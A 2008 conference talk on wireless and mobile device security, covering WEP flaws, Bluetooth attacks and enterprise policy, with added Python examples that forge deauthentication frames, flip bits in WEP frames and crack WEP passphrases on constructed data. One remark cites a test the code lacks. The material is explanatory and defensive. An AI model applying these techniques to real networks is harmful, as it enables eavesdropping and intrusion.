PROJECT TAKE MY DEVICE BUT NOT MY DATA DATE AUGUST 12, 2008 CLIENT TASSCC 2008 ANNUAL CONFERENCE

Monday, August 18, 2008

Good morning. I'm glad to be here at TASSCC, to be back in Galveston, and to have the opportunity to speak to you today about mobile devices and the security of the data on these devices, which are so widely used in today's work environment.

Goal

To provide an overview about risks associated with the use of mobile devices especially in a wireless world

My basic goal with today's presentation is to highlight some of the risks that come with the use of mobile devices. For example, CNN recently ran a story about drive-by wireless hacking, which some of you may have seen.

The story is just one illustration of how, even today, when wireless networks have been around for a while, there are still plenty of wireless networks that are not adequately secured, or not secured at all.

Discussion Areas

Physical Security

Mobile Devices

Public Wireless

Enterprise

The discussion areas will include physical security, which is perhaps somewhat overlooked as a component of technical security in general, but which certainly matters for mobile devices and the security of your data.

Since the title of the presentation includes the words mobile device, I guess we’ll also discuss mobile devices...

Public wireless - personal computer use, sure, but also with a focus on the use of public wireless with a work computer. The easiest way for someone to take their time reading the data on your mobile device is to take the device from you permanently. Therefore, road warriors must always keep the physical security aspect in mind.

Enterprise - policies in the enterprise: are authorized mobile devices managed appropriately, are wireless projects properly authorized, and are they managed in operation?

Contents

Home Networks

Tools

I'm going to touch on home networks because

Go over some of the tools we use in our audits and security service consulting.

Threats

Rogue Access Point

Misconfigured Access Point

Client Mis-association

WEP - dinosaur or still breathing?

The most common, as well as the most dangerous, wireless threat is the rogue access point. The rogue access point is typically a low-cost, SOHO-class access point brought in by an employee who wants wireless access. The default access point settings typically have no security enabled, so when it is plugged into the corporate network it creates an entry point for anyone with a Wi-Fi client within range.

For those enterprises with a wireless LAN infrastructure, one potential threat can arise from their own equipment. An access point that becomes misconfigured can open a door to the corporate network, in particular if the access point is reset to factory defaults or its security settings are turned off. If the access point is not centrally managed, the likelihood of this going unnoticed is high: employees will still be able to connect, so no problem will be reported.

Embedded Wi-Fi clients in laptops are now relatively common. Even in enterprises with a "no Wi-Fi" policy, a Windows XP laptop with a wireless client will automatically try to connect to an SSID that it has successfully connected to before. This scenario is very common for two reasons. First, if the employee has connected to a Linksys, Netgear or other home or hot spot access point using the default SSID, the laptop will automatically connect to another AP with the same SSID without the user being aware of the connection. Second, neighboring Wi-Fi networks can spill into the enterprise, and curious users connect to these open, insecure, and untrusted networks while still connected on the wired side of the trusted network. Users may also connect to these networks if the internal network firewall does not permit POP email accounts, does not permit access to certain web sites, or they do not want their outbound traffic monitored.

What's wrong with WEP? As part of the encryption process, WEP builds the RC4 key (the "seed") by prepending a 24-bit initialization vector (IV), chosen by the sending station, to the shared secret key supplied by the user. The shared secret is 40 bits (64 bits once the IV is counted); many vendors also offer 104-bit keys (128 bits with the IV), sometimes marketed as "WEP2".

WEP has been part of the 802.11 standard since its initial ratification in September 1999. At that time, the 802.11 committee was aware of some WEP limitations; however, WEP was the best choice to ensure efficient implementations worldwide. Nevertheless, WEP has undergone much scrutiny and criticism over the past couple of years. WEP is vulnerable because of its relatively short IVs and keys that remain static. The issues have less to do with the RC4 algorithm itself than with how WEP uses it. With only 24 bits, WEP eventually reuses the same IV for different data packets; on a large, busy network this can happen within an hour or so. The result is frames encrypted with identical keystreams. If an attacker collects enough frames under the same IV, they can work out what those frames have in common, i.e. the keystream for that IV, and with enough of them the shared secret key. Either lets the attacker decrypt 802.11 frames.

Wireless Networking Attacks

MAC Address Spoofing Attack

Shared Key Authentication Attacks

Disassociation and Deauthentication Attacks

Known Plaintext Attacks

The AP has a list of MAC addresses that are allowed onto the network.

An attacker can sniff an allowed MAC address and spoof it.

Disassociation/Deauthentication Attacks - Wi-Fi stations authenticate and then associate. These management frames carry no integrity protection, so anyone can send disassociation or deauthentication packets. Tools include Omerta (simply sends a disassociation for every data packet), AirJack (includes essid_jack, which sends a disassociation packet and then listens for association packets to find hidden SSIDs that are not broadcast), fata_jack (sends invalid authentication requests spoofing legitimate clients, causing the AP to disassociate the client), monkey_jack (deauthenticates a victim and poses as the AP when the victim returns), and Void11 (floods the AP with authentication requests, causing a DoS).
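As an added example (not code from the talk or from any of the tools named above), here is what a deauthentication frame looks like on the wire and the kind of detection a wireless IDS applies to it. The frames are constructed inside the block, the addresses and reason codes are illustrative, and no radio is touched; the point is that addr2 (the transmitter) is just a field anyone can fill in, which is all these tools rely on.

```python
"""Deauthentication/disassociation frames and a flood detector.
Constructed example for this page, not code from the talk or any of the
tools it names. Frames are built by hand; no radio or capture file is used."""
import struct
from collections import Counter
from typing import Dict, List, Tuple

MGMT_DISASSOC = 10          # management subtype 0xA
MGMT_DEAUTH = 12            # management subtype 0xC
BROADCAST = "ff:ff:ff:ff:ff:ff"
HEADER = "<HH6s6s6sH"       # frame control, duration, addr1, addr2, addr3, seq ctrl
HEADER_LEN = struct.calcsize(HEADER)   # 24 bytes


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_mgmt_frame(subtype: int, receiver: str, transmitter: str,
                     bssid: str, reason: int, seq: int = 0) -> bytes:
    """Management frame header followed by a 2-byte reason code. The frame
    carries no integrity protection, so nothing stops a third party from
    putting the AP's address in addr2 (the transmitter field)."""
    frame_control = (0 << 2) | (subtype << 4)   # version 0, type 0 = management
    header = struct.pack(HEADER, frame_control, 0, mac_bytes(receiver),
                         mac_bytes(transmitter), mac_bytes(bssid), (seq & 0xFFF) << 4)
    return header + struct.pack("<H", reason)


def parse_frame(frame: bytes) -> Dict[str, object]:
    fc, _dur, a1, a2, a3, _seq = struct.unpack_from(HEADER, frame, 0)
    info = {"type": (fc >> 2) & 0x3, "subtype": (fc >> 4) & 0xF,
            "addr1": mac_str(a1), "addr2": mac_str(a2), "addr3": mac_str(a3)}
    if info["type"] == 0 and info["subtype"] in (MGMT_DEAUTH, MGMT_DISASSOC):
        info["reason"] = struct.unpack_from("<H", frame, HEADER_LEN)[0]
    return info


def detect_deauth_flood(frames: List[bytes], threshold: int) -> Dict[Tuple[str, str], int]:
    """Count deauth/disassoc frames per (transmitter, receiver) pair and return
    the pairs at or above the threshold. A real AP sends these sparingly; a
    steady stream, especially to the broadcast address, is a flood."""
    counts: Counter = Counter()
    for raw in frames:
        p = parse_frame(raw)
        if p["type"] == 0 and p["subtype"] in (MGMT_DEAUTH, MGMT_DISASSOC):
            counts[(p["addr2"], p["addr1"])] += 1
    return {pair: n for pair, n in counts.items() if n >= threshold}


def sample_capture() -> List[bytes]:
    """Constructed traffic: one legitimate deauth (reason 3, station leaving)
    from the AP to a client, then 64 forged broadcast deauths carrying the
    AP's address in addr2 (reason 7, as injection tools commonly send)."""
    ap, client = "00:11:22:33:44:55", "66:77:88:99:aa:bb"
    frames = [build_mgmt_frame(MGMT_DEAUTH, client, ap, ap, reason=3, seq=1)]
    frames += [build_mgmt_frame(MGMT_DEAUTH, BROADCAST, ap, ap, reason=7, seq=i)
               for i in range(64)]
    return frames


if __name__ == "__main__":
    for pair, n in detect_deauth_flood(sample_capture(), threshold=10).items():
        print(f"deauth flood: {pair[0]} -> {pair[1]} ({n} frames)")
```

On the sample capture exactly one pair is flagged: the spoofed AP address sending 64 deauths to the broadcast address, while the single legitimate deauth stays below threshold. The only real fix is to authenticate management frames, which is what 802.11w management frame protection later added; none of the tools listed here work against it.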

Shared Key Authentication Attacks - the authentication challenge is sent in the clear, and the response is that challenge encrypted under an IV the client picks, so an observer obtains the keystream for that IV and can use it to authenticate falsely. Collecting keystreams for many IVs: the whole 24-bit IV space is about 25 GB of 1500-byte keystreams (2^24 x 1500 bytes), so you can collect all day and look at the data the next day; with all the keystreams stored you can decrypt any message.

Known Plaintext Attack

An attacker on the wired side sends a message to a wireless victim. Information on the wired network is unencrypted, so the attacker uses two computers: the one on the wired side sends the message, and a second one on the wireless side captures the encrypted copy. Because the attacker composed the message, the plaintext is known; then the matching encrypted packet is picked up in the air.

The AP encrypts the message and transmits it over the air.

The attacker now has both the plaintext and the ciphertext; XORing the two together yields the keystream for that IV.

Wireless Networking Attacks

Reaction Attack

FMS Attack

Message Modification Attack

Dictionary Attack on LEAP

Inductive Attack

Reuse IV Attack

WEP Key Attacks

Reaction attack -

The ICV is a linear checksum (CRC-32), so it is predictable

Change a few bits and rebroadcast (TCP ACKs are short packets)

Flip selected bits and watch whether the packet is accepted, to figure out whether the keystream bits are 0 or 1

Message Modification Attack - change the destination address to the attacker's wired node; the AP decrypts the packet and delivers it, unencrypted, to that node.
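The reaction and message modification attacks above both rest on one property: the ICV is a CRC-32, which is linear, so flipping plaintext bits through the ciphertext and repairing the ICV needs neither the key nor the keystream. The following is an added example written for this page, not code from the talk. The frame layout is a toy with a 4-byte destination field at a known offset, and the keystream is a constructed byte string standing in for RC4 output; the forgery succeeds against a receiver that checks the ICV.

```python
"""CRC-32 ICV bit-flipping, as used by the WEP message modification attack.
Constructed example for this page: toy frame layout, made-up keystream."""
import struct
import zlib
from typing import Optional


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_protect(plaintext: bytes, keystream: bytes) -> bytes:
    """Sender side: append the ICV (CRC-32 of the plaintext), then XOR
    plaintext || ICV with the keystream. WEP stores the ICV little-endian."""
    body = plaintext + struct.pack("<I", zlib.crc32(plaintext))
    assert len(keystream) >= len(body), "keystream too short for this frame"
    return xor_bytes(body, keystream)


def wep_verify(ciphertext: bytes, keystream: bytes) -> Optional[bytes]:
    """Receiver side: decrypt and accept the frame only if the ICV matches."""
    body = xor_bytes(ciphertext, keystream)
    plaintext, icv = body[:-4], struct.unpack("<I", body[-4:])[0]
    return plaintext if zlib.crc32(plaintext) == icv else None


def flip_bits(ciphertext: bytes, delta: bytes) -> bytes:
    """Attacker side. XOR-ing delta into the ciphertext XORs it into the
    plaintext. CRC-32 is affine: crc(P ^ D) = crc(P) ^ crc(D) ^ crc(zeros),
    so the ICV correction is crc(D) ^ crc(zeros) and needs no knowledge of P
    or of the keystream."""
    n = len(ciphertext) - 4
    assert len(delta) == n, "delta must cover exactly the plaintext bytes"
    icv_fix = zlib.crc32(delta) ^ zlib.crc32(bytes(n))
    return xor_bytes(ciphertext, delta + struct.pack("<I", icv_fix))


def field_delta(length: int, offset: int, old: bytes, new: bytes) -> bytes:
    """Delta that rewrites one field the attacker can guess (here a destination
    address) from `old` to `new` and leaves every other bit untouched."""
    delta = bytearray(length)
    delta[offset:offset + len(old)] = xor_bytes(old, new)
    return bytes(delta)


def demo() -> Optional[bytes]:
    """Redirect a frame addressed to 10.0.0.5 to the attacker's host 192.168.1.77."""
    keystream = bytes(range(200))                  # constructed stand-in for RC4 output
    original = b"DST:" + bytes([10, 0, 0, 5]) + b" quarterly numbers"
    ciphertext = wep_protect(original, keystream)
    delta = field_delta(len(original), 4, bytes([10, 0, 0, 5]), bytes([192, 168, 1, 77]))
    return wep_verify(flip_bits(ciphertext, delta), keystream)


if __name__ == "__main__":
    print(demo())   # the receiver accepts the modified frame
```

The receiver accepts the forged frame because the corrected ICV matches the modified plaintext. The same arithmetic is what makes the reaction attack work: each rebroadcast frame with a chosen delta either passes the ICV check or does not, and the receiver's behavior reveals one bit of information per attempt. An integrity check keyed with a secret (the MIC that TKIP and CCMP add) removes this property.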

Inductive attack - a theoretical attack; there is no tool that performs it. If you know n bytes of keystream, you can find the (n+1)st byte: send a ping request with all 256 possible values of the (n+1)st byte, and whichever one elicits a response is the correct one. Again theoretical, and there are easier ways to get the keystream.

Reuse IV Attack - if you have the keystream for a particular IV, you can keep using that IV with the keystream you have, to decrypt or inject traffic.

WEP Key Attacks - since people can't remember, or find it difficult to enter, a 40-bit or 104-bit key, wireless product vendors let you enter a passphrase, and the key is generated from it with a well-known passphrase algorithm. wep_crack builds a table of keys for all dictionary words and uses them to find the key; the dictionary-based attack takes a few minutes.
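The known plaintext attack from slide 7, the reuse IV attack and the passphrase dictionary attack above can be shown end to end on constructed frames. This is an added example written for this page, not code from the talk or from wep_crack. It omits the ICV, uses a made-up 40-bit key and IVs, and reproduces the common vendor 40-bit passphrase generator (the Neesus Datacom routine) from memory, which should be treated as an assumption rather than as any particular product's code.

```python
"""WEP keystream recovery, IV reuse, and a passphrase dictionary attack.
Constructed example for this page (not the talk's code): no ICV, made-up
key and IVs, and a from-memory version of the Neesus 40-bit passphrase
generator (assumption, not a specific vendor's implementation)."""
from typing import Dict, Iterable, Optional, Tuple


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4 (KSA then PRGA). Test vector: key b"Key" gives
    EB 9F 77 81 B7 34 CA 72 A7 19. WEP feeds it IV || shared key per packet."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(shared_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame = IV (in the clear) || plaintext XOR RC4(IV || key). ICV omitted."""
    assert len(iv) == 3, "WEP IVs are 24 bits"
    return iv + xor_bytes(plaintext, rc4_keystream(iv + shared_key, len(plaintext)))


def wep_decrypt(shared_key: bytes, frame: bytes) -> bytes:
    iv, body = frame[:3], frame[3:]
    return xor_bytes(body, rc4_keystream(iv + shared_key, len(body)))


def recover_keystream(known_plaintext: bytes, frame: bytes) -> Tuple[bytes, bytes]:
    """Known plaintext attack: the attacker sent this message from the wired
    side and sniffed the AP's encrypted copy; plaintext XOR ciphertext is the
    keystream for the IV the AP used."""
    return frame[:3], xor_bytes(known_plaintext, frame[3:])


def decrypt_with_reused_iv(table: Dict[bytes, bytes], frame: bytes) -> Optional[bytes]:
    """Reuse IV attack: once a keystream for an IV is known, any later frame
    under that IV decrypts without the key (up to the known keystream length)."""
    iv, body = frame[:3], frame[3:]
    ks = table.get(iv)
    if ks is None or len(ks) < len(body):
        return None
    return xor_bytes(body, ks[:len(body)])


def neesus_40bit_key(passphrase: str) -> bytes:
    """Vendor passphrase-to-40-bit-key generator (assumption: the widely copied
    Neesus routine). Characters fold into a 32-bit seed; each key byte is bits
    16..23 of an LCG step. ASCII high bits and seed bits 24..31 never reach the
    key, so only about 2^21 distinct keys can come out of it."""
    seed = 0
    for i, ch in enumerate(passphrase.encode("ascii")):
        seed ^= ch << (8 * (i % 4))
    key = bytearray()
    for _ in range(5):
        seed = (seed * 0x343FD + 0x269EC3) & 0xFFFFFFFF
        key.append((seed >> 16) & 0xFF)
    return bytes(key)


def crack_passphrase(candidates: Iterable[str], frame: bytes, known_prefix: bytes) -> Optional[str]:
    """Dictionary attack (what wep_crack automates): derive a key from each word
    and test it against the known start of one frame, e.g. the LLC/SNAP header
    AA AA 03 that begins every encrypted IP data frame."""
    iv, body = frame[:3], frame[3:]
    for word in candidates:
        ks = rc4_keystream(iv + neesus_40bit_key(word), len(known_prefix))
        if xor_bytes(body[:len(known_prefix)], ks) == known_prefix:
            return word
    return None


if __name__ == "__main__":
    key = neesus_40bit_key("secret")                       # made-up network key
    frame = wep_encrypt(key, b"\x01\x02\x03", b"\xaa\xaa\x03\x00\x00\x00\x08\x00payload")
    print(crack_passphrase(["password", "letmein", "secret"], frame, b"\xaa\xaa\x03"))
```

Note how little the dictionary attack needs: one frame and the three bytes of plaintext every IP-carrying data frame begins with. The passphrase collision in the test (changing the fourth character does not change the key) is the reason the 40-bit generator's effective key space is far smaller than 2^40.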

FMS Attack - based on a weakness in the way RC4 initializes its state: for certain weak IV/key combinations, the first bytes of the keystream leak information about the key. WEPCrack sniffs the network and analyzes the output using FMS to crack the key; AirSnort sniffs and uses part of FMS to find the key; other tools include dwepdump to capture packets and dwepcrack to find the WEP key.

Dictionary Attack on LEAP - Cisco's first attempt at stronger authentication. LEAP uses MS-CHAP v1 for authentication; capture the challenge and response, then brute-force the password with something like John the Ripper to break the password hash.

WPA

Replacement for WEP

Stronger Encryption

Two versus One

* WPA-Enterprise, a mechanism for network authentication using IEEE 802.1x and a supported EAP type, one of EAP/TLS, TTLS or PEAP;

* WPA-Personal, a mechanism for using TKIP without IEEE 802.1x authentication by using a shared passphrase, intended for consumer networks.

In July 2004, the IEEE approved the full IEEE 802.11i specification, which was quickly followed by a new interoperability testing certification from the WiFi Alliance known as WPA2. WPA2 is based on the Robust Security Network (RSN) mechanism, which provided support for all of the mechanisms available in WPA, as well as:

* Strong encryption and authentication support for infrastructure and ad-hoc networks (WPA is limited to infrastructure networks);

* Reduced overhead in key derivation during the wireless LAN authentication exchange;

* Support for opportunistic key caching to reduce the overhead in roaming between access points;

* Support for pre-authentication, where a station completes the IEEE 802.1X authentication exchange before roaming;

* Support for the CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol) encryption mechanism based on the Advanced Encryption Standard (AES) cipher as an alternative to the TKIP protocol.

As of March 2006, the WPA2 certification became mandatory for all new equipment certified by the Wi-Fi Alliance, ensuring that any reasonably modern hardware will support both WPA and WPA2.

By leveraging the RC4 cipher (also used in the WEP protocol), the IEEE 802.11i task group was able to improve the security of legacy networks with TKIP while the IEEE 802.11i amendment was completed. It is important to note, however, that TKIP was designed as an interim solution for wireless security, with the goal of providing sufficient security for 5 years while organizations transitioned to the full IEEE 802.11i security mechanism. While there have not been any catastrophic weaknesses reported in the TKIP protocol, organizations should take this design requirement into consideration and plan to transition WPA networks to WPA2 to take advantage of the benefits provided by the RSN architecture.

Physical Security

Wireless Access Points

Servers

The purpose of physical access controls is the same as that of computer and network access controls: you want to restrict access to those who are authorized to have it.

An even more common security feature than locks (calling them a "device" is unusual) is a physical barrier. Physical barriers help implement the physical-world equivalent of layered security. The outermost layer of physical security should contain the more public activities. A guard at a gate in a fence, for example, would be visible to all who happen to pass by. As you progress through the layers, the barriers and security mechanisms should become less public, to make it more difficult for observers to determine what mechanisms are in place. Signs are also an important element in security, as they announce to the public which areas are public and which are private. In addition to walls and fences, open space can also serve as a barrier. While this may at first seem an odd statement, consider the use of large areas of open space: for an intruder to cross this open space takes time, time in which they are vulnerable and their presence may be discovered. In today's environment, in which terrorist attacks have become more common, areas that may be considered a possible target for terrorist activity should take additional precautions. In addition to open space, which is necessary to lessen the effect of explosions, concrete barriers that stop vehicles from getting too close to facilities should also be used. These need not be unsightly concrete walls; many facilities have placed large, round concrete circles, filled them with dirt, and then planted flowers and other plants to construct a large, immovable planter.

Mobile Devices

BlackBerry

Windows Mobile

iPhone

Mobile Devices

Cell Phones

Bluejacking

Bluesnarfing

Bluebugging

Cell phones and other mobile devices with Bluetooth capability

Phone numbers, stored pictures and text messages can be grabbed from a distance from unsuspecting victims; some people store notes on their phones with application passwords or bank account information, all up for grabs.

Bluejacking Bluejacking is the act of anonymously sending a message to a user of a Bluetooth wireless technology enabled device who has turned on Bluetooth technology and made their device visible (also referred to as discoverable) to other devices. Attackers can target individuals or broadcast anonymous messages to all discoverable devices in the area. Because Bluetooth wireless technology enabled phones, PDAs, and laptops can search for other devices within a short range, attackers in crowded public areas can easily send anonymous messages without detection. Bluejacking is a user-based risk.

Bluesnarfing Bluesnarfing occurs when attackers use Bluetooth technology to connect to a target device without notifying the user and access target device information without knowledge or consent. Typically, the attacker accesses the user’s contact list, although all object exchange (OBEX)-addressable data that is stored on the device is vulnerable. Revealing sensitive information is the most obvious consequence of this type of attack, but there are other consequences, including sending an SMS message, initiating a phone call, or creating a false phone book entry. BlackBerry devices should not be vulnerable to bluesnarfing attacks because the OBEX functionality is not implemented on BlackBerry devices. The Bluetooth interface that is implemented by RIM is only plugged into the phone application (for voice usage), which should prevent attackers from accessing core BlackBerry device data. Bluesnarfing is a device-based risk that occurs because of an incorrect implementation of the specification for Bluetooth wireless technology by device manufacturers.

Bluebugging Bluebugging involves accessing mobile phone commands using Bluetooth wireless technology without notifying or alerting the user of the target device. This vulnerability enables the attacker to initiate phone calls, send and read SMS messages, access and enter phonebook contacts, eavesdrop on phone conversations, and connect to the Internet all without detection or authorization. Bluebugging is a device-based risk that occurs because of poor implementation of Bluetooth security mechanisms by device manufacturers.

Mobile Devices

Discuss WSJ article

Spyware is used by hackers to monitor what you type or the messages you receive; on phones with built-in GPS it could also allow them to monitor your location.

Many point to FlexiSPY, a program sold by Thai software company Vervata Co. The company promotes the product as a way for husbands and wives to catch their cheating spouses. Once installed on a person's phone, FlexiSPY tracks the device's whereabouts and monitors incoming and outgoing calls, text messages and emails. The information is then uploaded to a central server and can be viewed by the person who originally installed the software.

BlackBerrys may also be vulnerable to attack. In 2006, a security expert developed a program called BB Proxy to highlight the risks the gadgets face from spyware. The program can be delivered wirelessly or installed when a user downloads an unprotected program. Once inside, it can access a company's internal network and snoop on private information. BlackBerry manufacturer Research In Motion Ltd. says that security policies built into the BlackBerry Enterprise Server software, which helps coordinate corporate email systems with users' BlackBerrys, can guard against such spyware. Many small businesses, however, can't afford the BlackBerry server. Even Apple Inc.'s iPhone, with its lauded security upgrades, may be vulnerable, says Dan Hoffman, chief technology officer of security-software maker SMobile Systems Inc. While the iPhone offers password protection, it lacks other capabilities such as data encryption, Mr. Hoffman says. Most hackers can easily break through the password protection. "That's a pretty big deal," he says. In addition, the iPhone's Safari browser could be susceptible to attacks if it stumbles upon the wrong Web site. A group of ethical hackers called "White Hats," who simulate attacks to raise awareness, built a Web site that successfully delivered malicious software to an iPhone. The iPhone's ability to tap into Wi-Fi networks is another risk, because the Internet access isn't as secure as a tightly controlled BlackBerry.

BlackBerry

Confidentiality

Wireless IT commands

Confidentiality A message is considered confidential if only the intended recipient can view the contents of a message. Confidentiality is typically achieved using encryption, which is key-based scrambling of data. An encryption algorithm is designed so that only the parties that know the secret key can decrypt the encrypted data or cipher text. The BlackBerry Enterprise Solution uses a symmetric key encryption algorithm, which is designed to provide strong security and complete confidentiality of sensitive user information. BlackBerry devices are designed to compress the message before encrypting it using a key that is unique to that device. The key is not used in the compression. When receiving a message from the BlackBerry device, the BlackBerry Enterprise Server™ is designed to decompress and decrypt the message using the device's unique key. The BlackBerry Enterprise Server and the BlackBerry device should be the only parties that know the value of the master encryption key.

Wireless IT commands System administrators can control BlackBerry devices remotely using wireless IT commands. These commands are most commonly used on lost or stolen BlackBerry devices. The following wireless IT commands are available to system administrators:
• Kill Handheld: This command is designed to erase all user and application data that is stored on the BlackBerry device. If a BlackBerry device has been stolen or cannot be found, the system administrator can erase all information and application data remotely.
• Set a Password and Lock the Handheld: This command is designed to enable the system administrator to create a new password and lock the BlackBerry device remotely. If the user is uncertain of the BlackBerry device location, the system administrator can set a password (if one has not been set) and lock the device. The system administrator can then verbally communicate the new password to the user when the device is found. The user is prompted on the device to accept or reject the new password change.
• Reset the Password and Lock the Handheld: If the user has forgotten the BlackBerry device password, this command enables a system administrator to reset the password remotely and communicate the new password to the user.

BlackBerry

Confidentiality

Wireless IT commands


Note: If content protection is enabled, the administrator will not be able to reset the user’s password remotely. Wireless IT commands enable system administrators to immediately respond to a lost or stolen BlackBerry device and protect confidential enterprise information.

Using the BlackBerry Enterprise Server, system administrators can set specific IT policies to define how users use the security settings that are included on BlackBerry devices and in the BlackBerry Desktop Manager.
• IT policies for security: The BlackBerry Enterprise Solution offers users many different security settings for the BlackBerry device and BlackBerry Desktop Manager. All BlackBerry user security settings can be defined by system administrators. For example, system administrators specify whether a password is required, the length of time that a password can exist before it becomes invalid, and the length and composition of a password. Encryption key details can also be specified using an IT policy.

Public Wireless

Rogue Access Point

Ad Hoc Networking

Airsnarf can be used to set up a rogue access point and present a fake authentication web page to the user; this can be used to steal credit card numbers.

Ad Hoc Networking - computer-to-computer networking is allowed in XP; viruses and worms can be passed on if one computer is infected and the other does not have a client firewall.

Enterprise

IT Policies

Security Policy

1. Security Policy – Determine if the organization has a defined policy for the use of handheld devices. This policy should cover:
• Information that is to be placed on the device
• Security configuration of the device, including all software that is to be used to protect the information
• Modes of operation, including whether wireless radio frequency and/or infrared transmission is permitted
• Whether the user is permitted System Administrator rights on the company or government entity base PC with which the device synchronizes


Enterprise

IT Policies

Use Policy

2. Use Policy – Determine if the organization has included handheld devices in its acceptable use policy. This policy should cover:
• Prospective personally owned PDA users will sign an agreement defining the permitted use policy
• A PDA may not be used to enter or store passwords, safe/door combinations, personal identification numbers, or classified, sensitive or proprietary information
• No upload/download via wireless or infrared while connected to a desktop PC, particularly a networked PC
• Use infrared only for authorized data transfers
• PDAs will not be left unattended when attached to a computer
• PDAs will be secured with password protection when not in use
• The device should be used for work-related activities
• Device ownership is established (this will depend on the organization's policy regarding employee-owned devices)
• Allowed network connectivity will be identified
• Only approved software will be loaded on the device
• The user must take reasonable steps to prevent the loss or theft of the device
• The user must regularly sync the device with its home PC or the network so that appropriate security files (such as virus signatures and policy files) may be updated

Enterprise

IT Policies

Security Policy

Use Policy

Awareness Training

3. Awareness Training – Determine if the organization includes information about the security of handheld devices in its security awareness training. This training should cover:
• Physical security of the device
• The handheld security policy
• Information that may be stored on the device
• The procedure to follow if a device is lost or stolen

4. Device Registration – The organization should maintain a registry of all devices in use. This registry should include:
• Serial number of the device
• Make and model of the device
• Employee to whom the device has been issued
Each device that is owned by the organization should be marked as such with an asset tag or other permanent marking.

Enterprise

IT Policies

Security Policy

Use Policy

Awareness Training

Initial Checklist

Employee Termination Procedure

Device Authentication

AV software

5. Initial Checklist – Prior to the device being issued to an employee, the organization should follow a checklist to make sure that the device is registered properly and that the employee has received a device that is properly configured. Items on the checklist should include:
• Device added to the registry
• Employee has read and understood the Use Policy and the Security Policy associated with handheld devices
• Employee has received awareness training regarding the security of the handheld
• The device has been properly configured regarding security
• All necessary security software has been loaded on the device

6. Employee Termination Procedure – Determine if the return of handheld devices is included in the organization's employee termination procedures.

7. Device Authentication – Determine if device authentication meets the organization's authentication policy. All devices should require authentication at power-up and at regular intervals while active. The authentication mechanism should be one of the following:
• A strong password (preferably eight characters and a mixture of letters, numbers, and special characters)
• A smart card in conjunction with a PIN or password
• Biometrics (such as a fingerprint) in conjunction with a PIN or password
Note: authentication by handwriting is not recommended.

Software to enhance device authentication is available from Bluefire Security, Credant, and PDA Defense.

8. Anti-Virus Software – Determine if AV software is loaded on each handheld device. This software should be configured to examine files as they are opened. Updated signatures should be installed on the device every time the device syncs to its home PC, or at regular intervals via a network connection.

Enterprise

VPN software

Device integrity

Device Management

Network connections

Server maintenance

Virtual Private Network Software – Determine if VPN software is used when the device connects to the organization over the Internet. The VPN software should use IPsec or SSL and be tied into a strong authentication mechanism.

VPN software is available from Funk Software, NetMotion, Check Point, and Certicom.

13. Device Integrity – Determine if the device has a mechanism to detect modifications to key system files or registry settings. The device should raise an alarm if key files or settings are modified, and prevent damage on the device from spreading into the organization.

Integrity software is available from Bluefire Security.

14. Device Management – Determine if there is a central management capability in the organization. Since these devices are not completely under the control of the organization and are by nature mobile, the organization should have a mechanism to manage the security policy of the device from a central location.

15. Network Connections – Determine if all device network connections are either disabled or protected. The network connections to verify include:
• Bluetooth
• Infrared
• 802.11
• CDMA
• GPRS

Server maintenance - patches, updates

Home Networks

SSID

MAC filtering

Your home computer is a popular target for intruders. Why? Because intruders want what you've stored there. They look for credit card numbers, bank account information, and anything else they can find. By stealing that information, intruders can use your money to buy themselves goods and services.

But it’s not just money-related information they’re after. Intruders also want your computer’s resources, meaning your hard disk space, your fast processor, and your Internet connection. They use these resources to attack other computers on the Internet. In fact, the more computers an intruder uses, the harder it is for law enforcement to fi gure out where the attack is really coming from. If intruders can’t be found, they can’t be stopped, and they can’t be prosecuted.

SSID hiding: There is no such thing as "SSID hiding". You're only hiding the SSID in the access point's beacons. There are four other mechanisms that also broadcast the SSID over the 2.4 or 5 GHz spectrum: probe requests, probe responses, association requests, and reassociation requests. Essentially, you're hiding one of five SSID broadcast mechanisms. Nothing is hidden, and all you've achieved is to cause problems for Wi-Fi roaming when a client jumps from AP to AP. Hidden SSIDs also make wireless LANs less user-friendly. You don't need to take my word for it; see Robert Moskowitz, Senior Technical Director of ICSA Labs, in his white paper "Debunking the myth of SSID hiding".
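An added example (not part of the talk; the frames are constructed inline with made-up addresses and a made-up network name) of why hiding the beacon SSID hides nothing: the same SSID element rides in the clear in the four other management frames named above, and a passive listener only has to parse the tagged parameters.

```python
"""Where the SSID shows up besides the beacon. Constructed example for this
page; addresses and the SSID are made up and no capture file is read."""
import struct
from typing import Dict, List, Optional, Set, Tuple

ASSOC_REQ, REASSOC_REQ, PROBE_REQ, PROBE_RESP, BEACON = 0, 2, 4, 5, 8
NAME = {ASSOC_REQ: "association request", REASSOC_REQ: "reassociation request",
        PROBE_REQ: "probe request", PROBE_RESP: "probe response", BEACON: "beacon"}
# Fixed fields between the 24-byte header and the tagged parameters:
# capability + listen interval (4), plus current AP address (6) for reassoc;
# timestamp + beacon interval + capability (12) for beacon and probe response.
FIXED_LEN = {ASSOC_REQ: 4, REASSOC_REQ: 10, PROBE_REQ: 0, PROBE_RESP: 12, BEACON: 12}
IE_SSID = 0
BROADCAST = "ff:ff:ff:ff:ff:ff"
HEADER = "<HH6s6s6sH"       # frame control, duration, addr1, addr2, addr3, seq ctrl


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mgmt_frame(subtype: int, addr1: str, addr2: str, addr3: str, body: bytes) -> bytes:
    frame_control = subtype << 4            # version 0, type 0 = management
    return struct.pack(HEADER, frame_control, 0, mac_bytes(addr1),
                       mac_bytes(addr2), mac_bytes(addr3), 0) + body


def ssid_ie(ssid: str) -> bytes:
    """Tagged parameter: tag 0, length, value. A 'hidden' beacon uses length 0."""
    return bytes([IE_SSID, len(ssid)]) + ssid.encode()


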